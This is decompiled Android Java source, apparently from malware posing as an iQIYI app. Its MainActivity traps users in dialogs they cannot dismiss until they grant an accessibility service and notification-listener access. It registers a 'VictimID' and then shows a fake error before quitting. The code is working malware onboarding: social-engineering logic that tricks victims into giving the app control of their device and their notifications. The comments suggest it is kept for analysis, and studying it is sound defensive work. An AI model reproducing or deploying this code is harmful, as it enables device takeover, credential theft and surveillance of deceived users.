package com.iqiyi.i18n;

import android.app.AlertDialog;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.Bundle;
import android.widget.Toast;
import androidx.appcompat.app.c;

public class MainActivity extends c {
    /* access modifiers changed from: private */

    /* renamed from: t */
    public boolean accessSettingsShown = false;

    /* renamed from: com.iqiyi.i18n.MainActivity$a */
    class AccessSettingsDialogClick implements DialogInterface.OnClickListener {

        /* renamed from: b */
        final /* synthetic */ long startTime;

        AccessSettingsDialogClick(long j) {
            this.startTime = j;
        }

        /* JADX WARNING: type inference failed for: r3v0, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        /* JADX WARNING: type inference failed for: r2v5, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        public void onClick(DialogInterface dialogInterface, int i) {
            long currentTimeMillis = System.currentTimeMillis();
            if (MainActivity.this.accessSettingsShown || currentTimeMillis - this.startTime >= 2500) {
                MainActivity.this.showAccessibilitySettings();
                return;
            }
            //Show "Please read, before clicking"
            Toast.makeText(MainActivity.this.getApplicationContext(), String.format(LocaleManager.strings[3], new Object[]{MainActivity.this.getString(17039370)}), 1).show();
            MainActivity.this.askToInstallAccessibilityService();
        }
    }

    /* renamed from: com.iqiyi.i18n.MainActivity$b */
    class NotificationDialogClick implements DialogInterface.OnClickListener {

        /* renamed from: b */
        final /* synthetic */ long startTime;

        NotificationDialogClick(long j) {
            this.startTime = j;
        }

        /* JADX WARNING: type inference failed for: r1v0, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        /* JADX WARNING: type inference failed for: r1v3, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        /* JADX WARNING: type inference failed for: r3v0, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        /* JADX WARNING: type inference failed for: r2v5, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
        public void onClick(DialogInterface dialogInterface, int i) {
            long currentTimeMillis = System.currentTimeMillis();
            if (MainActivity.this.accessSettingsShown || currentTimeMillis - this.startTime >= 1000) {
                Intent intent = new Intent();
                MainActivity.this.getPackageName();
                intent.setAction("android.settings.ACTION_NOTIFICATION_LISTENER_SETTINGS");
                intent.setFlags(268435456);
                MainActivity.this.startActivity(intent);
                return;
            }
            //Show "Please read, before clicking"
            Toast.makeText(MainActivity.this.getApplicationContext(), String.format(LocaleManager.strings[3], new Object[]{MainActivity.this.getString(17039370)}), 1).show();
            MainActivity.this.askToInstallAccessibilityService();
        }
    }

    /* JADX WARNING: type inference failed for: r9v0, types: [android.content.Context, com.iqiyi.i18n.MainActivity, android.app.Activity] */
    /* access modifiers changed from: private */
    /* renamed from: F */
    public void askToInstallAccessibilityService() {
        String format = String.format(LocaleManager.strings[0], new Object[]{getString(2131689500), getString(17039370), getString(2131689500), getString(2131689500)});
        long currentTimeMillis = System.currentTimeMillis();
        AlertDialog.Builder builder = new AlertDialog.Builder(this);
        AlertDialog create = builder.setTitle(LocaleManager.strings[2] + " ( 1/2 )").setMessage(format).setPositiveButton(17039370, new AccessSettingsDialogClick(currentTimeMillis)).setIcon(17301659).create();
        create.setCanceledOnTouchOutside(false);
        create.show();
    }

    /* JADX WARNING: type inference failed for: r9v0, types: [android.content.Context, com.iqiyi.i18n.MainActivity, android.app.Activity] */
    /* renamed from: G */
    private void askToEnableNotifications() {
        String format = String.format(LocaleManager.strings[34], new Object[]{getString(2131689500), getString(17039370)});
        long currentTimeMillis = System.currentTimeMillis();
        AlertDialog.Builder builder = new AlertDialog.Builder(this);
        AlertDialog create = builder.setTitle(LocaleManager.strings[2] + " ( 2/2 )").setMessage(format).setPositiveButton(17039370, new NotificationDialogClick(currentTimeMillis)).setIcon(17301659).create();
        create.setCanceledOnTouchOutside(false);
        create.show();
    }

    /* JADX WARNING: type inference failed for: r2v0, types: [com.iqiyi.i18n.MainActivity, android.app.Activity] */
    /* access modifiers changed from: private */
    /* renamed from: H */
    public void showAccessibilitySettings() {
        this.accessSettingsShown = true;
        Intent intent = new Intent("android.settings.ACCESSIBILITY_SETTINGS");
        intent.setFlags(268435456);
        startActivity(intent);
    }

    /* JADX WARNING: type inference failed for: r1v0, types: [android.content.Context, androidx.appcompat.app.c, com.iqiyi.i18n.MainActivity, android.app.Activity] */
    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        MainActivity.super.onCreate(bundle);
        setContentView(2131427360);

        VictimID.getOrMake(this);

        if (!LocaleManager.setLocale(this)) {
            finishAndRemoveTask();
        }
    }

    /* JADX WARNING: type inference failed for: r3v0, types: [androidx.fragment.app.d, com.iqiyi.i18n.MainActivity, android.app.Activity] */
    /* access modifiers changed from: protected */
    public void onResume() {
        MainActivity.super.onResume();
        if (!MyAccessibilityService.m2266j()) {
            askToInstallAccessibilityService();
        } else if (!MyNotificationListener.isConnected()) {
            askToEnableNotifications();
        } else {
            //Show a toast with a genering error and ask to retry later
            Toast.makeText(getApplicationContext(), LocaleManager.strings[33], 1).show();
            finishAndRemoveTask();
        }
    }
}
